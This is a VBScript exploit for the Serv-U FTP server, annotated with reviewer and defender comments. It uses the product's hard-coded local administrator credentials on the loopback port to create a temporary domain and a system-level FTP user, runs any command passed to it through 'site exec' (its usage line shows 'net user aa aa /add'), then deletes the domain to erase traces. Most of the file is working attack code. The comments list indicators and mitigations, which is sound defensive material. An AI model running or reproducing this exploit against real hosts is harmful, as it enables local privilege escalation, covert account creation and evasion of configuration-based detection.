';By dugu
';thanks Crackme
';usage:wscript su.vbs "net user aa aa /add"
' Setup: configuration and argument handling for a script that speaks to a
' Serv-U FTP administration listener on the loopback interface (see the
' connect calls further down).
' NOTE(review): "on error resume next" suppresses every runtime error for the
' rest of the script, so a failed object creation, connect or send is silently
' ignored and nothing is reported to the caller.
on error resume next
Dim servuManagePort
Dim servuManageName
Dim servuManagePass
Dim command
' Defender note: the port, account name and password below are hard-coded.
' They are presumably the vendor-default local administration values of older
' Serv-U releases (confirm against the vendor advisory for the installed
' version). Any local user who can open a loopback socket can use them while
' they remain unchanged, so the mitigation is to upgrade Serv-U and to change
' the local administrator password and port where the product allows it.
servuManagePort = 43958 ';change to the host's Serv-U management port
servuManageName = "LocalAdministrator" ';management user name
servuManagePass = "#l@$ak#.lk;0@P" ';management password
' The first command-line argument is taken as the command string and is
' lower-cased before use; a missing argument raises an error that is swallowed
' by "on error resume next".
command = LCase(WScript.Arguments(0)) ';set the command you want to run in the first argument
' revdata is declared but never assigned or read in this script: no server
' reply is ever inspected. sendata holds each outgoing protocol line.
Dim revdata
Dim sendata
' Stage 1: log in to the loopback administration port and register a temporary
' FTP domain plus a user account on it.
' Every line is sent blind: the script waits 10 ms between sends and never
' reads a reply, so it cannot tell whether any step was accepted.
'
' Defender note: indicators visible in this stage are a script host
' (wscript/cscript) instantiating the MSWinsock.Winsock COM object and
' connecting to 127.0.0.1 on the administration port, the literal domain name
' "hhxx", the account "hhxxttxs" and an FTP listener appearing on port 222.
' Process-creation and loopback-connection telemetry, or Serv-U's own logs,
' are the places to look for them.
Set sock=createobject("MSWinsock.Winsock")
' protocol 0 selects TCP on the Winsock control.
Sock.protocol=0
Sock.connect "127.0.0.1",servuManagePort
WScript.sleep 10
' Authenticate with the hard-coded administration account.
Sendata="USER "&servuManageName& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="PASS "&servuManagePass& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
' Switch the session into Serv-U's maintenance command mode.
Sendata="SITE MAINTENANCE"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
' Define a domain. The pipe-separated value carries the name "hhxx", the
' address 0.0.0.0 and port 222; the meaning of the remaining fields is not
' shown in this file.
Sendata="-SETDOMAIN"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Domain=hhxx|0.0.0.0|222|-1|1|0 "& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-DynDNSEnable=0 "& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata=" DynIPName="& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
' Create a user on that domain (IP 0.0.0.0, port 222) with a fixed name and
' password, home directory c:\, "Maintenance=System" and an access rule on
' c:\ with the flag string RWAMELCDP.
' NOTE(review): "Maintenance=System" presumably grants the account Serv-U
' system-administrator rights, which is what permits SITE EXEC later; confirm
' against the Serv-U documentation.
Sendata="-SETUSERSETUP"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-IP=0.0.0.0"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-PortNo=222"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-User=hhxxttxs"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Password=hhxxttxs"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-HomeDir=c:\"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Maintenance=System"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Ratios=None"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata=" Access=c:\|RWAMELCDP"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-GETUSERSETUP"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
' Close the administration session before using the new listener.
sock.close
WScript.sleep 10
' Stage 2: connect to the listener on port 222, log in with the fixed account
' name and password, and pass the caller's command string to "site exec".
' No reply is read, so the script does not learn whether the command ran.
'
' Defender note: a command accepted here is executed by the FTP service, so it
' runs with whatever account the Serv-U service uses (often a highly
' privileged one on default installs; confirm on the host). Running the
' service under a dedicated low-privilege account limits the impact. Useful
' detections are child processes spawned by the Serv-U service binary and
' follow-on events such as local account creation (the usage line at the top
' of the file shows "net user ... /add" as the example command).
Set sock2=createobject("MSWinsock.Winsock")
Sock2.protocol=0
Sock2.connect "127.0.0.1",222
WScript.sleep 10
Sendata="USER hhxxttxs"& chr(10) &chr(13)
Sock2.senddata Sendata
WScript.sleep 10
Sendata="PASS hhxxttxs"& chr(10) &chr(13)
Sock2.senddata Sendata
WScript.sleep 10
' The command string is concatenated without any validation or quoting.
Sendata="site exec "&command&chr(10) &chr(13)
Sock2.senddata Sendata
WScript.sleep 10
Sock2.close
WScript.sleep 10
' Stage 3: cleanup. Log in to the administration port again with the same
' hard-coded account and ask Serv-U to delete the domain bound to 0.0.0.0
' port 222, then issue -GETDOMAIN. Replies are again not read.
'
' Defender note: because the domain is removed at the end, the Serv-U
' configuration at rest may show no trace of the domain once the script has
' finished (presumably; confirm how the installed version persists domain
' changes). Investigation should therefore lean on Serv-U logs, process
' creation events and loopback connection telemetry rather than on the
' current configuration alone.
Set sock3=createobject("MSWinsock.Winsock")
Sock3.protocol=0
Sock3.connect "127.0.0.1",servuManagePort
WScript.sleep 10
Sendata="USER "&servuManageName& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="PASS "&servuManagePass& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="SITE MAINTENANCE"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
' Remove the temporary domain identified by IP 0.0.0.0 and port 222.
Sendata="-DELETEDOMAIN"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="-IP=0.0.0.0"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata=" PortNo=222"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="-GETDOMAIN"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sock3.close
|